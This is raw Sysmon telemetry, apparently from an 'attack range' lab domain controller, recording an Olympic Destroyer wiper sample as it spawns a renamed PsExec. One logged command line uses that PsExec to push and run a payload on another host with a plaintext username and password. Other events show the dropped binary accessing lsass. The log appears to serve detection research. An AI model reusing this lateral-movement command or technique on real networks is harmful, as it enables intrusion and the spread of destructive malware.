10:57:04.983{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.983{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.983{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.983{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.952{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-F405-000000003802}1016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.952{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-F405-000000003802}1016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.867{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.851{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.863{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.851{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.851{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.836{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.836{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000292204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.602{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-15.eu-central-1.compute.internal010.0.1.15;C:\Windows\System32\svchost.exe 22542200x8000000000000000292203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.579{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-1.eu-central-1.compute.internal0::ffff:10.0.1.1;C:\Windows\System32\svchost.exe 22542200x8000000000000000292202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.502{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-15.eu-central-1.compute.internal0::ffff:10.0.1.15;C:\Windows\System32\svchost.exe 13241300x8000000000000000292201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:04.820{C8EA50B7-1300-6216-EF05-000000003802}4652C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.814{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-F205-000000003802}6296C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000292432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.751{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A61A3B7CC3CF30662C6F22F3998FD49,SHA256=90DACBE5D06457B71B2F3EC518292484ABD47E8D3F1E28C3F6D39E2DD12B7628,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000292431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.698{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.698{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.698{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:06.682{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.682{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.682{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.682{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.682{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.651{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2896026CAA79774D55383CAFEFD1536,SHA256=717F145CA4B0F8439BA4BA74BA0550C632AC7F37574313B385F72125E26F7321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.651{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0B06-000000003802}7160C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.651{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0B06-000000003802}7160C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.635{C8EA50B7-1302-6216-0B06-000000003802}71606972C:\Windows\system32\conhost.exe{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.619{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1302-6216-0B06-000000003802}7160C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.619{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1302-6216-0B06-000000003802}7160C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.566{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C2DE9C04D51A6B1BB2B69F5F88914CB3,SHA256=CFFA5FDDE16CBE9F147D1D98D5E7322AA6A4232E7E02753B71E7910D2E6B8F8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.566{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 